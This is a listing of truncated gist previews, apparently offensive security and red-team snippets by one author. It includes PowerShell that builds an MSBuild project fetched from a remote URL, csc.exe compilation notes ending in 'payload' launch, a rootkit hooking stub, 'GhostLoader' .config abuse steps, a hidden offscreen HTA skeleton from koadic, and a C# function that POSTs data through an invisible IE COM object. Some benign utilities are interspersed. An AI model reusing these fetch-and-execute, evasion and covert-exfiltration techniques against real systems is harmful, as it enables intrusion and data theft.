leoloobeek

//Base64 Raw Decoder 

function Base64Decode(str) {
    if (!(/^[a-z0-9+/]+={0,2}$/i.test(str)) || str.length%4 != 0) throw Error('Not base64 string');

    var b64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
    var o1, o2, o3, h1, h2, h3, h4, bits, d=[];

    for (var c=0; c<str.length; c+=4) {  // unpack four hexets into three octets

leoloobeek

After a little more research, 'In Memory' notion was a little exaggerated (hence the quotes). However, we'll call it 'In Memory Inspired' ;-)

These examples are PowerShell alternatives to MSBuild.exe/CSC.exe for building (and launching) C# programs.

Basic gist after running PS script statements:

- Loads C# project from file or web URL
- Compile with csc.exe [e.g. "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\subadmin\AppData\Local\Temp\lz2er5kc.cmdline"]
- Comvert to COFF [e.g. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\subadmin\AppData\Local\Temp\RES11D5.tmp" "c:\Users\subadmin\AppData\Local\Temp\CSCDECDA670512E403CA28C9512DAE1AB3.TMP"] 
- Launch program (payload)

leoloobeek

In-memory PowerShell XSLT project build: 

[Reflection.Assembly]::LoadWithPartialName('Microsoft.Build'); 
$proj = [System.Xml.XmlReader]::create("https://gist.githubusercontent.com/caseysmithrc/8e58d11bc99e496a19424fbe5a99175f/raw/38256d70b414f6678005366efc86009c562948c6/xslt2.proj")
$e=new-object Microsoft.Build.Evaluation.Project($proj); 
$e.build();

leoloobeek

#include <windows.h>
#include <stdio.h>


FARPROC fpCreateProcessW;
BYTE bSavedByte;

// Blog Post Here:
// https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108
// tasklist | findstr explore.exe

leoloobeek

<?xml version='1.0'?>
<data>
  <circle>
    <radius>12</radius>
  </circle>
  <circle>
    <radius>37.5</radius>
  </circle>
</data>

leoloobeek

# first: mkdir user && cd user && cp /path/to/get_gists.py .
# python3 get_gists.py user
import requests
import sys
from subprocess import call

user = sys.argv[1]

r = requests.get('https://api.github.com/users/{0}/gists'.format(user))

leoloobeek

GhostLoader Steps :)

1. Create C:\Tools
2. Copy Some .NET, any .NET binary to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe

leoloobeek

using System;
using System.IO;
using System.Net;
using System.Text;
using System.IO.Compression;
using System.Collections.Generic;
using System.Configuration.Install;
using System.Runtime.InteropServices;

leoloobeek

<html>
<head>
<script language="JScript">
// HTA skeleton taken from https://github.com/zerosum0x0/koadic
window.resizeTo(1, 1);
window.moveTo(-2000, -2000);
window.blur();

try
{

leoloobeek

// sample function that takes in a destination server, POST data, and custom HTTP request headers
private string SendData(string dst, byte[] postData, string customHeaders)
{
    Type com_type = Type.GetTypeFromCLSID(new Guid("0002DF01-0000-0000-C000-000000000046"));
    object IE = Activator.CreateInstance(com_type);

    object[] falseArr = new object[] { false };
    object[] trueArr = new object[] { true };
    com_type.InvokeMember("Visible", System.Reflection.BindingFlags.SetProperty, null, IE, falseArr);
    com_type.InvokeMember("Silent", System.Reflection.BindingFlags.SetProperty, null, IE, trueArr);